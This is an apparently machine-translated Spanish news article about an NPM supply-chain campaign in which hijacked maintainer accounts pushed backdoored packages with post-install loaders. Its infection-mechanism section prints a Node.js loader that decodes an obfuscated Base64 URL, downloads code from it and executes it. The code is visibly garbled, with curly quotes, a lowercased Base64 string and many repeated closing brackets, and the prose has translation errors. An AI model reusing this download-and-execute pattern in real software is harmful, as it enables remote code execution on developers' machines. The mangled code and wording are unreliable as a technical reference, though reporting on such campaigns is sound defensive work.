Un sofisticado ataque de la cadena de suministro de NPM que surgió a fines de agosto se dirigió a miles de proyectos posteriores al inyectar cargas útiles maliciosas en bibliotecas populares de JavaScript.
Los informes iniciales apuntaban a una nueva variante de la notoria técnica de tipoquating, pero el análisis posterior reveló una campaña más elaborada que aprovechó las credenciales de mantenimiento comprometidas para publicar módulos traseros bajo nombres de paquetes legítimos.
El ataque se extendió rápidamente por el ecosistema, tocando las aplicaciones en plataformas SaaS empresariales, herramientas de desarrolladores e incluso proyectos educativos.
Investigadores de Wiz.io anotado Actividad de red inusual que se origina en las tuberías de integración continua (IC) poco después de actualizaciones inocuas de la biblioteca.
Si bien la telemetría inicial sugirió la exfiltración de datos, la inspección más cercana mostró que las cargas útiles solo ejecutaban rutinas condicionales, evitando un comportamiento destructivo absoluto.
En cambio, el código malicioso muestreó las variables de entorno, los metadatos del sistema registrados y se preparan para descargar cargas útiles secundarias de los dominios controlados por los atacantes.
Por diseño, los atacantes minimizaron las anomalías detectables, mezclándose con actualizaciones de paquetes de rutina y estrategias de versiones cuidadosas para mantener la persistencia.
Las evaluaciones de impacto estimaron que más de 4.500 proyectos obtuvieron al menos una liberación comprometida antes de que los mantenedores retrocedieran las versiones afectadas.
A pesar de este amplio alcance, el análisis de los canales de pago basados en blockchain y las billeteras de criptomonedas vinculadas a la campaña mostraron que solo se completaron un puñado de transacciones, que se dispararon menos de $ 200 en valor.
Impacto de los paquetes NPM populares pirateados (fuente – Wiz.io)
El bajo rendimiento financiero sugiere que los operadores estaban más interesados en el reconocimiento y el establecimiento de puntos de apoyo en lugar de la monetización inmediata, subrayando los motivos en evolución detrás de las amenazas modernas de la cadena de suministro.
Los analistas de Wiz.io luego identificaron indicadores adicionales de compromiso (COI) integrados en registros de IC populares, incluidas las URL ofuscadas y los bloques de datos codificados con Base64 que sirvieron como el punto de estadificación inicial para familias de malware más complejas.
Este descubrimiento provocó un parche rápido de los guiones de tuberías y un mayor escrutinio de las credenciales de registro de NPM en los principales equipos de desarrollo.
Mecanismo de infección y persistencia
Los paquetes maliciosos emplearon un mecanismo de infección en varias etapas que comenzó con un guión posterior a la instalación de aspecto benigno.
Tras la instalación, el script ejecuta un pequeño cargador escrito en node.js:-
// figura1_loader.js const https = require (‘https’); const {exec} = require (‘child_process’); const payloadUrl = buffer.from (‘ahr0chm6ly9lbwfpbc5hzzgryzxnzlmnvbs9sb2fkzxiuanm =’, ‘base64’). toString (); https.get (payloadUrl, (res) => {let data = “”; res.on (‘data’, (chunk) => data += chunk); res.on (‘end’, () => {exec (data, (error, sTdout, stderr) => {if (error) console.error (stderr); else console.log (stdout);});});});});});});});});
Esto demuestra cómo el atacante ocultó la URL de descarga real utilizando la codificación Base64 para evadir las defensas simples de combate de cadenas.
Después de recuperar la carga útil secundaria, el cargador escribe un archivo de servicio Node.js en el directorio de inicio del usuario, asegurando la ejecución automática al reiniciar el sistema.
Este servicio introduce una capa de persistencia que sobrevive a las eliminaciones de paquetes y las limpiezas de registro, otorgando efectivamente al atacante acceso a largo plazo a entornos de desarrollo comprometidos.
Al encadenar los scripts inocuos y la estadificación encriptada, la campaña evitó los mecanismos de detección comunes y subrayó la creciente sofisticación de las amenazas de la cadena de suministro.
Aumente su SOC y ayude a su equipo a proteger su negocio con inteligencia gratuita de amenazas de primer nivel: Solicitar prueba de prueba premium de búsqueda TI.
